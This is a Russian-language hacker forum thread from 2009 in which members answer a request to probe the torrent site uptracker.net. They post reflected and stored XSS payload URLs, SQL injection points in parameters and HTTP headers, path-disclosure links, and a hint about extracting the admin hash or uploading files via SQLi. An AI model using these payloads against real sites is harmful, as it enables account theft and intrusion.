Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
uptracker.net - торрент трекер |
26.01.2009, 20:47
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
uptracker.net - торрент трекер
Прошу проверить сайт на уязвимости, www.uptracker.net
P.S. Прошу тут выкладывать уязвимости и не ломать.
С меня + сколько смогу...
Всем спасибо
|
|
|
27.01.2009, 13:56
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
Банально XSS в поиске:
http://www.uptracker.net/search.php?search=%22%3E%3Cscript%3Ealert%28docume nt.cookie%29%3C%2Fscript%3E
Скуль+раскрытие путей
http://www.uptracker.net/userdetails.php?id=723983'
Активная XSS в чате
http://www.uptracker.net/vorbeste.php
<img src='a' onerror='alert()'/>
Последний раз редактировалось oRb; 27.01.2009 в 14:09..
|
|
|
|
27.01.2009, 16:37
|
|
Новичок
Регистрация: 19.01.2009
Сообщений: 12
Провел на форуме:
236651
Репутация:
92
|
|
SQL иньекции
в
1. /search.php
2. /faq_ru.php
3. /index.php
4. /recover.php
5. /confirm_no_email.php
6. /takelanguage.php
7. /forums.php
8. /login.php
9. /userdetails.php
т.д. (дальше не проверял)
которые возникают из-за недостаточной фильтрации следующих полей http запросов:
referer:'
x-forwarded-for:'
client-ip:'
SQL Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '>= first AND <= last' at line 1
XSS в
/recover.php
если в POST запросе значение email передать к примеру
<script>alert(12345)</script>
Последний раз редактировалось Maestus; 27.01.2009 в 17:23..
|
|
|
|
27.01.2009, 16:57
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Раскрытие путей
http://uptracker.net/login.php?returnto[]=x
http://uptracker.net/topten.php?type[]=
404 (ссылка с профиля)
http://uptracker.net/fotogallery.php
SQL-inj (не раскручивал, некоторые, возможно, не представляют опасности, но как минимум - раскрытие путей)
// UPDATE, имхо
http://uptracker.net/details.php?id=-1'
http://uptracker.net/sendmessage.php?receiver=-1'
http://uptracker.net/browse.php?cat=-1'&incldead=1
users.php - любые параметры.
Активная XSS
http://uptracker.net/details.php?id=7614&viewcomm=6693#comm6693
<img src=. onerror=alert()>
------------
В форуме http://uptracker.net/forums.php?action=viewtopic&topicid=3114
<img src=. onerror=alert()>
-----------
http://uptracker.net/musik.php
Уязвимы все поля
-----------
Так же активка в ПМе.
-----------
Активка в профиле - подпись или информация
<img src=. onerror=alert()>
Накрутка рейтинга релиза -
onClick="update_rating(999) - функция не проверяет переданное значение
Пассивная XSS
http://uptracker.net/friends.php?action=add&type=friend&targetid=<scrip t>alert()</script>
http://uptracker.net/forums.php?action=<script>alert()</script>
Последний раз редактировалось BlackSun; 27.01.2009 в 19:20..
|
|
|
|
27.01.2009, 17:13
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
Спасибо большое за старания, ещё вопрос. Можно ли как нибудь узнать через скуль - хэш админа ? Ну через преведённые ваши скуль иньекции?
Вы меня простите, я в этом не очень...
|
|
|
|
27.01.2009, 17:17
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Сообщение от Arigona
Спасибо большое за старания, ещё вопрос. Можно ли как нибудь узнать через скуль - хэш админа ? Ну через преведённые ваши скуль иньекции?
Вы меня простите, я в этом не очень...
Через скулю можно узнать не только хэш, при наличии привелегий рута у текушего юзера БД можно читать \ загружать файлы.
|
|
|
|
27.01.2009, 17:24
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
BlackSun, можеш привести пример для узнования хэша админа? Через какую- то скулю, или заливка шелла или узнавание пароля дб? Извени за глупый вопрос конечно  Просто для меня это важно Я писал этот движёк с TS обычного, и у меня его украли, ps и сделали на нём другие трекера... Вот хочу посмотреть что можно сделать ...
Пс, если что найдёш скинь в личку пожалуйста..
С меня + и уважение, хотя я тут всех уважаю 
Спасибо заранее.. |
|
|
|
27.01.2009, 19:39
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
[оффтоп]как ты мог его писать,у испанцев каких-то спи3*ил,баннеров еще бы штук 20 нацепил бы[/оффтоп]
по сабжу
пасивная КСС
Код:
http://www.uptracker.net/viewrequests.php?category=%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
Последний раз редактировалось baltazar; 27.01.2009 в 19:50..
|
|
|
|
27.01.2009, 20:19
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
ПС, для красоты сделал. если не нравится сниму
Спасибо за помощь) Если кто ещё может решиться помочь.. пишите |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
